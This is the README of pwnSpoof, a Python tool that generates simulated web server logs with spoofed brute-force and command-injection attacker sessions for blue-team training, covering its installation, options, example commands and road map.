pwnSpoof is written in Python and is tested with Python 3. No extra modules are needed; we only use the standard library.

If you get the following error message, please specify python3 when running pwnSpoof. Python 2 is not supported.

  File "pwnspoof.py", line 176
print("{:6.2f}% ".format(y * x), end="\r", flush=True)
^
SyntaxError: invalid syntax

Installation
  1. Git clone the pwnSpoof repo
git clone https://github.com/punk-security/pwnspoof
  2. Change directory to pwnSpoof
cd pwnspoof
  3. Run pwnSpoof
python pwnspoof.py --help

Usage

Switches
positional arguments:
{banking,wordpress,generic}
App to emulate

optional arguments:
-h, --help show this help message and exit
--out OUT Output file (default: pwnspoof.log)
--iocs Do you want to know the attackers iocs for easier searching? (default: False)

log generator settings:
--log-start-date LOG_START_DATE
Initial start of logs, in the format YYYYMMDD i.e. "20210727"
--log-end-date LOG_END_DATE
End date for logs, in the format YYYYMMDD i.e. "20210727"
--session-count SESSION_COUNT
Number of legitimate sessions to spoof (default: 2000)
--max-sessions-per-user MAX_SESSIONS_PER_USER
Max number of legitimate sessions per user (default: 3)
--server-fqdn SERVER_FQDN
Override the emulated web apps default fqdn
--server-ip SERVER_IP
Override the emulated web apps randomised IP
--server-type {IIS,NGINX,CLF}
Server to spoof (default: IIS)
--uri-file URI_FILE File containing web uris to override defaults, do not include extensions
--noise-file NOISE_FILE
File containing noise uris to override defaults, include extensions

attack settings:
--spoofed-attacks SPOOFED_ATTACKS
Number of attacker sequences to spoof (default: 1)
--attack-type {bruteforce,command_injection}
Number of attacker sequences to spoof (default: bruteforce)
--attacker-geo ATTACKER_GEO
Set the attackers geo by 2 letter region. Use RD for random (default: RD)
--attacker-user-agent ATTACKER_USER_AGENT
Set the attackers user-agent. Use RD for random (default: RD)

Examples

The following example will create a set of IIS logs for bruteforce against pwnedbank.co.uk.

python pwnspoof.py banking --server-fqdn pwnedbank.co.uk --attack-type bruteforce --server-type IIS --out iis-output.log

The following example will create a set of NGINX logs for command_injection against pwnedbank.co.uk.

python pwnspoof.py banking --server-fqdn pwnedbank.co.uk --attack-type command_injection --server-type NGINX

The following example will create a set of logs with 5000 routine sessions and 3 attack sessions

python pwnspoof.py banking --session-count 5000 --spoofed-attacks 3

The following example will create a set of logs and output the attackers IP addresses

python pwnspoof.py banking --spoofed-attacks 3 --iocs 

Demo



Road Map

pwnSpoof is built to produce authentic web attack logs and it does this really well. Right now we are focused on refactoring the code, building out our testing suite and getting the first push to PyPI, but we have huge ambitions for pwnSpoof.


Coming soon

Adding extra webapps beyond banking to provide extra variety to the logs

  • Social media
  • Wordpress
  • E-Commerce

Adding additional and more dynamic web attacks

  • Full OWASP TOP 10
  • Customisable payload encoding
  • Multi-session attacks
  • Obfuscation

Unscheduled aspirations

Training Videos!

pwnSpoof was built to be a great tool for training the blue team so it only makes sense to produce some training materials to show it off.

  • How to ingest logs into various log analysers (Splunk, Elastic, Open Distro, Sentinel)
  • How to use the power of REGEX to pivot around the data

Not just weblogs

We would love to see pwnSpoof generating all kinds of threat hunting logs such as Office365 audit logs for Sharepoint, Onedrive and AzureAD

Blackhat Arsenal

We have submitted pwnSpoof to Blackhat Arsenal for consideration and it would be AWESOME to demo it at Blackhat London this year (2021).

Why not contact us with some extra ideas, or add to the project?


Contact

Credit
  • ip2location : We make use of the IP2Location LITE Country database to provide geographically relevant IP addresses.

This product includes IP2Location LITE data available from https://lite.ip2location.com


